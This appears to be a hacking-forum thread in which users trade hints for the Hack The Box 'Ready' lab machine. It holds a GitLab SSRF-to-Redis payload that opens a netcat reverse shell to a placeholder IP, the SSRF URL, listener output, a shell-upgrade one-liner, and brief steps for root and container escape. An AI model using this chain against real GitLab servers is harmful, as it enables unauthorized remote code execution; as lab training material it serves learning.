TUTORIAL Ready User Part
by liveartic12 - December 12, 2020 at 10:55 PM
#13
(December 13, 2020 at 01:28 AM)xxxxxd Wrote:
(December 13, 2020 at 01:21 AM)Kali76 Wrote:
(December 13, 2020 at 01:07 AM)xxxxxd Wrote: you can simply use nc like
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash ***IP***  ***PORT*** \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec

Not work ... Response --

HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: Sun, 13 Dec 2020 00:19:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2936
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-Request-Id: 2b9bc018-b0c8-4fb4-860b-80c4ae76afee
X-Runtime: 0.019574

422 Unprocessable Entity, says that your request is not in a correct format.

-> new project -> import project -> repo by url -> some name and this url: git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git -> intercept with burp and edit the request as shown here: https://github.com/jas502n/gitlab-SSRF-r...te-request
Can’t replicate this at all for some reason, strange.
#14
(December 13, 2020 at 11:39 AM)JustMeAndYou Wrote:
(December 13, 2020 at 01:28 AM)xxxxxd Wrote:
(December 13, 2020 at 01:21 AM)Kali76 Wrote:
(December 13, 2020 at 01:07 AM)xxxxxd Wrote: you can simply use nc like
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash ***IP***  ***PORT*** \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec

Not work ... Response --

HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: Sun, 13 Dec 2020 00:19:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2936
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-Request-Id: 2b9bc018-b0c8-4fb4-860b-80c4ae76afee
X-Runtime: 0.019574

422 Unprocessable Entity, says that your request is not in a correct format.

-> new project -> import project -> repo by url -> some name and this url: git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git -> intercept with burp and edit the request as shown here: https://github.com/jas502n/gitlab-SSRF-r...te-request
Can’t replicate this at all for some reason, strange.

yes neither do I, I am listening on my docker with netcat but I do not get anything, something wrong, REsponse---

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Dec 2020 03:14:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, private, must-revalidate, no-store
Etag: W/"566a101f09634a379f862102aebae194"
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Request-Id: be7cf16c-f1f8-4370-928b-f5b849cc4143
X-Runtime: 0.102288
X-Ua-Compatible: IE=edge
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Content-Length: 50705
#15
Don't forget to URL encode it..
#16
Guys you can do it without burp, search for liveoverflow article, you can send the whole url encoded payload inside the url field and get a shell !!!

https://liveoverflow.com/gitlab-11-4-7-r...-ctf-2018/
#17
Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
#18
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

Not work /bin/sh

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9
#19
1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)
#20
(December 13, 2020 at 01:11 PM)Kali76 Wrote:
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

Not work /bin/sh

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done but ls wont work there coz there no files or folders there

try other comands 
whoami and more...
lmao u got shell and only tried ls command there xD
#21
(December 13, 2020 at 06:15 PM)0xvijay Wrote:
(December 13, 2020 at 01:11 PM)Kali76 Wrote:
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

Not work /bin/sh

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done but ls wont work there coz there no files or folders there

try other comands 
whoami and more...
lmao u got shell and only tried ls command there xD

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
#22
(December 13, 2020 at 07:00 PM)Kali76 Wrote:
(December 13, 2020 at 06:15 PM)0xvijay Wrote:
(December 13, 2020 at 01:11 PM)Kali76 Wrote:
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

Not work /bin/sh

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done but ls wont work there coz there no files or folders there

try other comands 
whoami and more...
lmao u got shell and only tried ls command there xD

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git

python3 -c "import pty;pty.spawn('/bin/bash')";

run this there
#23
(December 13, 2020 at 07:05 PM)0xvijay Wrote:
(December 13, 2020 at 07:00 PM)Kali76 Wrote:
(December 13, 2020 at 06:15 PM)0xvijay Wrote:
(December 13, 2020 at 01:11 PM)Kali76 Wrote:
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole

Not work /bin/sh

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done but ls wont work there coz there no files or folders there

try other comands 
whoami and more...
lmao u got shell and only tried ls command there xD

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git

python3 -c "import pty;pty.spawn('/bin/bash')";

run this there

not have a shell, how do i launch it?
#24
(December 13, 2020 at 07:09 PM)Kali76 Wrote:
(December 13, 2020 at 07:05 PM)0xvijay Wrote:
(December 13, 2020 at 07:00 PM)Kali76 Wrote:
(December 13, 2020 at 06:15 PM)0xvijay Wrote:
(December 13, 2020 at 01:11 PM)Kali76 Wrote: Not work /bin/sh

[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls

My payload:

https://pastebin.com/YWWR9Uq9

python3 -c "import pty;pty.spawn('/bin/bash')";

That's all you've done but ls wont work there coz there no files or folders there

try other comands 
whoami and more...
lmao u got shell and only tried ls command there xD

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git

python3 -c "import pty;pty.spawn('/bin/bash')";

run this there

not have a shell, how do i launch it?

You can run coz got connected lmao

ok wait I make a detailed writeup for u soon for user + root

Possibly Related Threads…
Thread Author Replies Views Last Post
BUYING Attended root part Kali76 0 401 February 21, 2021 at 03:00 AM
Last Post: Kali76
TUTORIAL Root Part ScriptKiddie evil-winrm0779 4 1,141 February 13, 2021 at 06:12 PM
Last Post: bugbunny
TUTORIAL HTB Ready box orangutang 0 274 February 10, 2021 at 10:53 PM
Last Post: orangutang

 Users browsing this thread: 1 Guest(s)